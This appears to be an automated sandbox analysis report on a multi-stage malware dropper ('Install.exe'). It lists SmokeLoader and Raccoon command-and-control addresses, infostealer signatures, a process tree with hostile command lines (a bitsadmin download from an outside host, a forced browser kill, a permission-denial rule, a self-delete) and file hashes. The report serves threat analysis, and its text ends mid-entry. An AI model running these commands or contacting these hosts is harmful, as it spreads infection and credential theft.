Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    229s
  • max time network
    242s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    25-04-2021 16:03

Errors

Reason
Machine shutdown

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

16992cd33145ccbb6feeacb4e84400a56448fa14

Attributes
  • url4cnc

    https://telete.in/baudemars

rc4.plain
rc4.plain

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 36 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 2 IoCs
  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:876
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:12844
    • C:\Users\Admin\AppData\Local\Temp\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1020
      • C:\Users\Admin\AppData\Local\Temp\is-6CD3U.tmp\Install.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-6CD3U.tmp\Install.tmp" /SL5="$30102,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Users\Admin\AppData\Local\Temp\is-KBHFI.tmp\Ultra.exe
          "C:\Users\Admin\AppData\Local\Temp\is-KBHFI.tmp\Ultra.exe" /S /UID=burnerch1
          3⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:600
          • C:\Program Files\DVD Maker\KYXARVDYZQ\ultramediaburner.exe
            "C:\Program Files\DVD Maker\KYXARVDYZQ\ultramediaburner.exe" /VERYSILENT
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:296
            • C:\Users\Admin\AppData\Local\Temp\is-HOHQV.tmp\ultramediaburner.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-HOHQV.tmp\ultramediaburner.tmp" /SL5="$20158,281924,62464,C:\Program Files\DVD Maker\KYXARVDYZQ\ultramediaburner.exe" /VERYSILENT
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:1380
              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                6⤵
                • Executes dropped EXE
                PID:1824
          • C:\Users\Admin\AppData\Local\Temp\4e-9951c-34b-df8b2-aa51f1397d330\Gaelogacydae.exe
            "C:\Users\Admin\AppData\Local\Temp\4e-9951c-34b-df8b2-aa51f1397d330\Gaelogacydae.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1796
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1828
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1828 CREDAT:275457 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:1616
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1828 CREDAT:340994 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:12944
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 12944 -s 1428
                  7⤵
                  • Program crash
                  • Suspicious behavior: GetForegroundWindowSpam
                  PID:7888
          • C:\Users\Admin\AppData\Local\Temp\87-598a3-4f6-0888e-235a890dcc587\Cyvylinaefi.exe
            "C:\Users\Admin\AppData\Local\Temp\87-598a3-4f6-0888e-235a890dcc587\Cyvylinaefi.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:760
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xnvvnf4f.pu4\instEU.exe & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:10460
              • C:\Users\Admin\AppData\Local\Temp\xnvvnf4f.pu4\instEU.exe
                C:\Users\Admin\AppData\Local\Temp\xnvvnf4f.pu4\instEU.exe
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:10596
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ezztmoox.ync\google-game.exe & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:12596
              • C:\Users\Admin\AppData\Local\Temp\ezztmoox.ync\google-game.exe
                C:\Users\Admin\AppData\Local\Temp\ezztmoox.ync\google-game.exe
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:12684
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                  7⤵
                  • Loads dropped DLL
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:12752
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4jclceio.1rs\md1_1eaf.exe & exit
              5⤵
                PID:13244
                • C:\Users\Admin\AppData\Local\Temp\4jclceio.1rs\md1_1eaf.exe
                  C:\Users\Admin\AppData\Local\Temp\4jclceio.1rs\md1_1eaf.exe
                  6⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  PID:13284
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q31qg1tl.xfv\askinstall39.exe & exit
                5⤵
                  PID:4204
                  • C:\Users\Admin\AppData\Local\Temp\q31qg1tl.xfv\askinstall39.exe
                    C:\Users\Admin\AppData\Local\Temp\q31qg1tl.xfv\askinstall39.exe
                    6⤵
                    • Executes dropped EXE
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    PID:4388
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      7⤵
                        PID:6424
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          8⤵
                          • Kills process with taskkill
                          PID:6596
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ipxtkbe3.2wy\inst.exe & exit
                    5⤵
                      PID:6332
                      • C:\Users\Admin\AppData\Local\Temp\ipxtkbe3.2wy\inst.exe
                        C:\Users\Admin\AppData\Local\Temp\ipxtkbe3.2wy\inst.exe
                        6⤵
                        • Executes dropped EXE
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        PID:6432
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2bp3mkjw.rxp\SunLabsPlayer.exe /S & exit
                      5⤵
                        PID:6736
                        • C:\Users\Admin\AppData\Local\Temp\2bp3mkjw.rxp\SunLabsPlayer.exe
                          C:\Users\Admin\AppData\Local\Temp\2bp3mkjw.rxp\SunLabsPlayer.exe /S
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops file in Program Files directory
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          PID:6888
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy8C5A.tmp\tempfile.ps1"
                            7⤵
                              PID:7724
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy8C5A.tmp\tempfile.ps1"
                              7⤵
                                PID:9500
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy8C5A.tmp\tempfile.ps1"
                                7⤵
                                  PID:9748
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy8C5A.tmp\tempfile.ps1"
                                  7⤵
                                    PID:10032
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy8C5A.tmp\tempfile.ps1"
                                    7⤵
                                      PID:10328
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy8C5A.tmp\tempfile.ps1"
                                      7⤵
                                      • Drops file in Program Files directory
                                      PID:10596
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy8C5A.tmp\tempfile.ps1"
                                      7⤵
                                      • Checks for any installed AV software in registry
                                      PID:10680
                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                      7⤵
                                      • Download via BitsAdmin
                                      PID:10824
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kqxwyd2r.fyx\GcleanerWW.exe /mixone & exit
                                  5⤵
                                    PID:7040
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ojamz2id.mhk\toolspab1.exe & exit
                                    5⤵
                                      PID:7284
                                      • C:\Users\Admin\AppData\Local\Temp\ojamz2id.mhk\toolspab1.exe
                                        C:\Users\Admin\AppData\Local\Temp\ojamz2id.mhk\toolspab1.exe
                                        6⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        PID:7360
                                        • C:\Users\Admin\AppData\Local\Temp\ojamz2id.mhk\toolspab1.exe
                                          C:\Users\Admin\AppData\Local\Temp\ojamz2id.mhk\toolspab1.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: MapViewOfSection
                                          PID:7748
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ojmxhlzc.nrc\c7ae36fa.exe & exit
                                      5⤵
                                        PID:7424
                                        • C:\Users\Admin\AppData\Local\Temp\ojmxhlzc.nrc\c7ae36fa.exe
                                          C:\Users\Admin\AppData\Local\Temp\ojmxhlzc.nrc\c7ae36fa.exe
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          • Suspicious behavior: MapViewOfSection
                                          PID:7472
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d4utyj0f.1hv\app.exe /8-2222 & exit
                                        5⤵
                                          PID:7512
                                          • C:\Users\Admin\AppData\Local\Temp\d4utyj0f.1hv\app.exe
                                            C:\Users\Admin\AppData\Local\Temp\d4utyj0f.1hv\app.exe /8-2222
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            PID:7600
                                            • C:\Users\Admin\AppData\Local\Temp\d4utyj0f.1hv\app.exe
                                              "C:\Users\Admin\AppData\Local\Temp\d4utyj0f.1hv\app.exe" /8-2222
                                              7⤵
                                              • Executes dropped EXE
                                              • Modifies data under HKEY_USERS
                                              PID:9104
                                • C:\Users\Admin\AppData\Local\Temp\824A.exe
                                  C:\Users\Admin\AppData\Local\Temp\824A.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:6276
                                • C:\Users\Admin\AppData\Local\Temp\843E.exe
                                  C:\Users\Admin\AppData\Local\Temp\843E.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:6308
                                • C:\Users\Admin\AppData\Local\Temp\9214.exe
                                  C:\Users\Admin\AppData\Local\Temp\9214.exe
                                  1⤵
                                  • Executes dropped EXE
                                  PID:6528
                                • C:\Users\Admin\AppData\Local\Temp\9C52.exe
                                  C:\Users\Admin\AppData\Local\Temp\9C52.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:6968
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9C52.exe"
                                    2⤵
                                      PID:7528
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /T 10 /NOBREAK
                                        3⤵
                                        • Delays execution with timeout.exe
                                        PID:7044
                                  • C:\Users\Admin\AppData\Local\Temp\A76A.exe
                                    C:\Users\Admin\AppData\Local\Temp\A76A.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:4516
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      2⤵
                                        PID:7388
                                    • C:\Users\Admin\AppData\Local\Temp\B09F.exe
                                      C:\Users\Admin\AppData\Local\Temp\B09F.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:7244
                                    • C:\Users\Admin\AppData\Local\Temp\B561.exe
                                      C:\Users\Admin\AppData\Local\Temp\B561.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:7304
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Users\Admin\AppData\Local\5ec8eded-0b30-40d9-a472-9fb691b7ec24" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                        2⤵
                                        • Modifies file permissions
                                        PID:7088
                                      • C:\Users\Admin\AppData\Local\Temp\B561.exe
                                        "C:\Users\Admin\AppData\Local\Temp\B561.exe" --Admin IsNotAutoStart IsNotTask
                                        2⤵
                                          PID:7676
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7676 -s 300
                                            3⤵
                                            • Program crash
                                            PID:7764
                                      • C:\Users\Admin\AppData\Local\Temp\CBBF.exe
                                        C:\Users\Admin\AppData\Local\Temp\CBBF.exe
                                        1⤵
                                        • Executes dropped EXE
                                        PID:7468
                                      • C:\Users\Admin\AppData\Local\Temp\FCDE.exe
                                        C:\Users\Admin\AppData\Local\Temp\FCDE.exe
                                        1⤵
                                          PID:7364
                                        • C:\Windows\SysWOW64\explorer.exe
                                          C:\Windows\SysWOW64\explorer.exe
                                          1⤵
                                            PID:7932
                                          • C:\Windows\explorer.exe
                                            C:\Windows\explorer.exe
                                            1⤵
                                              PID:8168
                                            • C:\Windows\SysWOW64\explorer.exe
                                              C:\Windows\SysWOW64\explorer.exe
                                              1⤵
                                                PID:8188

                                              Network

                                              MITRE ATT&CK Matrix ATT&CK v6

                                              Persistence

                                              Registry Run Keys / Startup Folder

                                              1
                                              T1060

                                              BITS Jobs

                                              1
                                              T1197

                                              Defense Evasion

                                              File Permissions Modification

                                              1
                                              T1222

                                              Modify Registry

                                              3
                                              T1112

                                              BITS Jobs

                                              1
                                              T1197

                                              Install Root Certificate

                                              1
                                              T1130

                                              Credential Access

                                              Credentials in Files

                                              2
                                              T1081

                                              Discovery

                                              Software Discovery

                                              1
                                              T1518

                                              Security Software Discovery

                                              1
                                              T1063

                                              Query Registry

                                              3
                                              T1012

                                              System Information Discovery

                                              3
                                              T1082

                                              Peripheral Device Discovery

                                              1
                                              T1120

                                              Collection

                                              Data from Local System

                                              2
                                              T1005

                                              Command and Control

                                              Web Service

                                              1
                                              T1102

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                MD5

                                                7124be0b78b9f4976a9f78aaeaed893a

                                                SHA1

                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                SHA256

                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                SHA512

                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                MD5

                                                7124be0b78b9f4976a9f78aaeaed893a

                                                SHA1

                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                SHA256

                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                SHA512

                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                              • C:\Program Files\DVD Maker\KYXARVDYZQ\ultramediaburner.exe
                                                MD5

                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                SHA1

                                                938acc555933ee4887629048be4b11df76bb8de8

                                                SHA256

                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                SHA512

                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                              • C:\Program Files\DVD Maker\KYXARVDYZQ\ultramediaburner.exe
                                                MD5

                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                SHA1

                                                938acc555933ee4887629048be4b11df76bb8de8

                                                SHA256

                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                SHA512

                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                              • C:\Program Files\install.dat
                                                MD5

                                                31e4a5735b20be6a53cbb552663b1cc3

                                                SHA1

                                                c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                SHA256

                                                b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                SHA512

                                                3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                              • C:\Program Files\install.dll
                                                MD5

                                                fe60ddbeab6e50c4f490ddf56b52057c

                                                SHA1

                                                6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                SHA256

                                                9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                SHA512

                                                0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                MD5

                                                8cacfffb88b232e8c5d61a887b51e91e

                                                SHA1

                                                6a5d65edfd6b846b011fd2bd1ea339cadf74684f

                                                SHA256

                                                e6afa035aefe43410d85ac64aac3c320d93402fb1d5d577dc4ffbeb45e7323df

                                                SHA512

                                                1685636b4236255358c0dc984394cb283a95da27d474c4970cacec09bcaa40a13661dbcb5b72518742db75b04555ae7a454769d0eaa92904a2319ad7752aeb79

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                MD5

                                                a5659504e965ab3ec32e79cd490ea74a

                                                SHA1

                                                944ccfefc81c329dffd801a0f15fa5ea0d19bb57

                                                SHA256

                                                39fc8c0dab858df397d96e49da0663ea3692f9a9c786baeb11916aafa0702155

                                                SHA512

                                                a34ba248e10e34bc5dc3d20eca9e5503d8a3ed998b9cc85a59b7b350e44225de21aeb58f3cf9f989ebe96436ba14c92277f7488f72dc201e57097fe6857ae754

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                MD5

                                                91e33d243859a1725aef6f35dc0df713

                                                SHA1

                                                41c474ddcdcde67043c0c7baada213f6caa29cf8

                                                SHA256

                                                55ec6949176406d62816f2d845a4311f27cb71670db5e3817e478c08097b941b

                                                SHA512

                                                d48e727b5063be4048cb6428c4ed10c7143e6b37c6c10e03532c5754a1430876ddeb3c8e26f2e4238646e717454d2a175a09fc14774f9a7916eaf481c288b221

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                MD5

                                                7f74241c6cd3786953f7ac1c99519dc6

                                                SHA1

                                                2d00287a641128207390bea97e7ccf196cbb9777

                                                SHA256

                                                47203e1c8161110967510d09824222349152b0fc276b5a01501f8c9b8b963661

                                                SHA512

                                                f155846aad29d4b0d05ca15413a05cd6f2bcd49a84b59e5d1e16e0163f79b41af80a7c84203179d33bf6da634503962335a04d52350e45f3947aff130bfd29e2

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                MD5

                                                cac4ed9f51b01f173d54c0ad6044e8e2

                                                SHA1

                                                90afaa23a482acce731e46a9431b45bda6662f02

                                                SHA256

                                                9c6a22672c45e2286b9cc9551412c4f5dacd9deb6fffa83d25da7e1efe1b118e

                                                SHA512

                                                f2e2b79e63808cb1b4118d51ec9e8bbab8a1237651a2c2f8b20ace14e580f980a24e794f23eae87e113c2dcedd2a555122adadd7c17752d896e2a700a204b678

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L1Y3K90W\OMOJH8S4.htm
                                                MD5

                                                ec90af743febc0436be3025c53147a38

                                                SHA1

                                                9105d3d54400ae88b43af756c61c218307337c86

                                                SHA256

                                                54f7bfe5e952585bd82d3f940251abcd8890ba5fc65f37857fe353ebcd4395f6

                                                SHA512

                                                28448289d825b5f8040d7bf9cf179fcde3a068da55a6e533e2bcbe8cb13a344af09cb7f123985b7c6a9555de811b0746542c851bffd83c99eb89349e2950d4a3

                                              • C:\Users\Admin\AppData\Local\Temp\2bp3mkjw.rxp\SunLabsPlayer.exe
                                                MD5

                                                549d99440a1bede768d86d9363300834

                                                SHA1

                                                e04040365f0cb3b1c031f03a392ce568fa5ac96e

                                                SHA256

                                                0eaec609649f16d40804ebaa289b7e78cf4b21fe9c67075dc42a5ac4ba4e8cb7

                                                SHA512

                                                ad29430c3a79cb7b6791dcf799e6ea923f2991fd315659dc96c65b0b4ec3957e6b97a0357a560d566a18df7a0dff63881888c43fd261f32f60737480e9eb13b7

                                              • C:\Users\Admin\AppData\Local\Temp\2bp3mkjw.rxp\SunLabsPlayer.exe
                                                MD5

                                                549d99440a1bede768d86d9363300834

                                                SHA1

                                                e04040365f0cb3b1c031f03a392ce568fa5ac96e

                                                SHA256

                                                0eaec609649f16d40804ebaa289b7e78cf4b21fe9c67075dc42a5ac4ba4e8cb7

                                                SHA512

                                                ad29430c3a79cb7b6791dcf799e6ea923f2991fd315659dc96c65b0b4ec3957e6b97a0357a560d566a18df7a0dff63881888c43fd261f32f60737480e9eb13b7

                                              • C:\Users\Admin\AppData\Local\Temp\4e-9951c-34b-df8b2-aa51f1397d330\Gaelogacydae.exe
                                                MD5

                                                18e49540637bccc9b3a7ca3d48cae223

                                                SHA1

                                                b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                SHA256

